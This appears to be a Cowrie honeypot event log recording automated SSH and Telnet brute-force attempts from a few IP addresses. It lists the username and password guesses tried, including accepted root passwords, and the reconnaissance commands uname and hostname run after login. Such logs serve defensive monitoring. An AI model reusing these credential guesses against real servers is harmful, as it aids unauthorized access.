{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42786,"dst_ip":"1.2.3.4","dst_port":22,"session":"137737c3aeee","protocol":"ssh","message":"New connection: 212.227.125.160:42786 (1.2.3.4:22) [session: 137737c3aeee]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.949010Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42812,"dst_ip":"1.2.3.4","dst_port":22,"session":"b296ca4badb3","protocol":"ssh","message":"New connection: 212.227.125.160:42812 (1.2.3.4:22) [session: b296ca4badb3]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.949711Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.950506Z","src_ip":"212.227.125.160","session":"6ed3d9d00f33"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.951339Z","src_ip":"212.227.125.160","session":"137737c3aeee"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.951930Z","src_ip":"212.227.125.160","session":"b296ca4badb3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58566,"dst_ip":"1.2.3.4","dst_port":22,"session":"40128752d255","protocol":"ssh","message":"New connection: 212.227.235.229:58566 (1.2.3.4:22) [session: 40128752d255]","sensor":"my-vps","timestamp":"2025-08-28T06:37:28.281642Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:28.283004Z","src_ip":"212.227.235.229","session":"40128752d255"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:37:28.529329Z","src_ip":"212.227.235.229","session":"40128752d255"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"appuser","message":"login attempt [appuser/appuser] failed","sensor":"my-vps","timestamp":"2025-08-28T06:37:29.272426Z","src_ip":"212.227.235.229","session":"40128752d255"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:37:30.520487Z","src_ip":"212.227.235.229","session":"40128752d255"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":56718,"dst_ip":"1.2.3.4","dst_port":23,"session":"dcba75395b9f","protocol":"telnet","message":"New connection: 8.222.212.69:56718 (1.2.3.4:23) [session: dcba75395b9f]","sensor":"my-vps","timestamp":"2025-08-28T06:37:31.358144Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34978,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb792bbacd5e","protocol":"ssh","message":"New connection: 212.227.125.160:34978 (1.2.3.4:22) [session: cb792bbacd5e]","sensor":"my-vps","timestamp":"2025-08-28T06:37:38.128977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:38.130065Z","src_ip":"212.227.125.160","session":"cb792bbacd5e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:37:38.344709Z","src_ip":"212.227.125.160","session":"cb792bbacd5e"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom","message":"login attempt [tom/tom] failed","sensor":"my-vps","timestamp":"2025-08-28T06:37:38.986899Z","src_ip":"212.227.125.160","session":"cb792bbacd5e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:37:40.202465Z","src_ip":"212.227.125.160","session":"cb792bbacd5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52372,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5f23c55c74e","protocol":"ssh","message":"New connection: 212.227.235.229:52372 (1.2.3.4:22) [session: b5f23c55c74e]","sensor":"my-vps","timestamp":"2025-08-28T06:37:44.750199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:44.751483Z","src_ip":"212.227.235.229","session":"b5f23c55c74e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:37:45.003600Z","src_ip":"212.227.235.229","session":"b5f23c55c74e"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom","message":"login attempt [tom/tom] failed","sensor":"my-vps","timestamp":"2025-08-28T06:37:45.762122Z","src_ip":"212.227.235.229","session":"b5f23c55c74e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:37:47.016838Z","src_ip":"212.227.235.229","session":"b5f23c55c74e"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":34182,"dst_ip":"1.2.3.4","dst_port":22,"session":"653c141ab93a","protocol":"ssh","message":"New connection: 193.32.162.145:34182 (1.2.3.4:22) [session: 653c141ab93a]","sensor":"my-vps","timestamp":"2025-08-28T06:37:49.831514Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:37:49.862452Z","src_ip":"193.32.162.145","session":"653c141ab93a"}
{"eventid":"cowrie.session.closed","duration":30.60735559463501,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:37:51.374271Z","src_ip":"8.222.212.69","session":"367f45b1041d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59070,"dst_ip":"1.2.3.4","dst_port":22,"session":"23ba60d3f6c7","protocol":"ssh","message":"New connection: 212.227.125.160:59070 (1.2.3.4:22) [session: 23ba60d3f6c7]","sensor":"my-vps","timestamp":"2025-08-28T06:37:54.587286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:54.590703Z","src_ip":"212.227.125.160","session":"23ba60d3f6c7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:37:54.806834Z","src_ip":"212.227.125.160","session":"23ba60d3f6c7"}
{"eventid":"cowrie.session.connect","src_ip":"211.171.47.199","src_port":42433,"dst_ip":"1.2.3.4","dst_port":23,"session":"654aa9dc2f5a","protocol":"telnet","message":"New connection: 211.171.47.199:42433 (1.2.3.4:23) [session: 654aa9dc2f5a]","sensor":"my-vps","timestamp":"2025-08-28T06:37:54.985927Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123456","message":"login attempt [root/Qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:37:55.683101Z","src_ip":"212.227.125.160","session":"23ba60d3f6c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:37:56.145796Z","src_ip":"212.227.125.160","session":"23ba60d3f6c7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:37:56.146576Z","src_ip":"212.227.125.160","session":"23ba60d3f6c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:37:56.367128Z","src_ip":"212.227.125.160","session":"23ba60d3f6c7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:37:56.368389Z","src_ip":"212.227.125.160","session":"23ba60d3f6c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47836,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b1d7dcb3992","protocol":"ssh","message":"New connection: 212.227.235.229:47836 (1.2.3.4:22) [session: 2b1d7dcb3992]","sensor":"my-vps","timestamp":"2025-08-28T06:38:01.135399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:38:01.136427Z","src_ip":"212.227.235.229","session":"2b1d7dcb3992"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:38:01.395399Z","src_ip":"212.227.235.229","session":"2b1d7dcb3992"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123456","message":"login attempt [root/Qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:38:02.143036Z","src_ip":"212.227.235.229","session":"2b1d7dcb3992"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:38:02.728166Z","src_ip":"212.227.235.229","session":"2b1d7dcb3992"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:38:02.729068Z","src_ip":"212.227.235.229","session":"2b1d7dcb3992"}
{"eventid":"cowrie.session.closed","duration":31.437979221343994,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:38:02.796022Z","src_ip":"8.222.212.69","session":"dcba75395b9f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:38:02.980195Z","src_ip":"212.227.235.229","session":"2b1d7dcb3992"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:38:02.981235Z","src_ip":"212.227.235.229","session":"2b1d7dcb3992"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":28487,"dst_ip":"1.2.3.4","dst_port":22,"session":"60a33593c6ac","protocol":"ssh","message":"New connection: 212.227.235.229:28487 (1.2.3.4:22) [session: 60a33593c6ac]","sensor":"my-vps","timestamp":"2025-08-28T06:38:09.462427Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:38:09.981883Z","src_ip":"212.227.235.229","session":"60a33593c6ac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:38:09.982619Z","src_ip":"212.227.235.229","session":"60a33593c6ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35422,"dst_ip":"1.2.3.4","dst_port":22,"session":"31e449d0b13a","protocol":"ssh","message":"New connection: 212.227.125.160:35422 (1.2.3.4:22) [session: 31e449d0b13a]","sensor":"my-vps","timestamp":"2025-08-28T06:38:11.040347Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:38:11.135600Z","src_ip":"212.227.125.160","session":"31e449d0b13a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:38:11.259586Z","src_ip":"212.227.125.160","session":"31e449d0b13a"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-28T06:38:12.136295Z","src_ip":"212.227.125.160","session":"31e449d0b13a"}
{"eventid":"cowrie.login.success","username":"root","password":"0899400729%$","message":"login attempt [root/0899400729%$] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:38:12.467638Z","src_ip":"212.227.235.229","session":"60a33593c6ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27198,"dst_ip":"1.2.3.4","dst_port":22,"session":"96e8bbc6c37d","protocol":"ssh","message":"New connection: 212.227.235.229:27198 (1.2.3.4:22) [session: 96e8bbc6c37d]","sensor":"my-vps","timestamp":"2025-08-28T06:38:13.156093Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T06:38:13.156777Z","src_ip":"212.227.235.229","session":"96e8bbc6c37d"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T06:38:13.286608Z","src_ip":"212.227.235.229","session":"96e8bbc6c37d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:38:13.356663Z","src_ip":"212.227.125.160","session":"31e449d0b13a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:38:13.642577Z","src_ip":"212.227.235.229","session":"60a33593c6ac"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T06:38:13.643318Z","src_ip":"212.227.235.229","session":"60a33593c6ac"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T06:38:14.263615Z","src_ip":"212.227.235.229","session":"96e8bbc6c37d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:38:14.269445Z","src_ip":"212.227.235.229","session":"60a33593c6ac"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:38:14.584514Z","src_ip":"212.227.235.229","session":"60a33593c6ac"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:38:15.395484Z","src_ip":"212.227.235.229","session":"96e8bbc6c37d"}
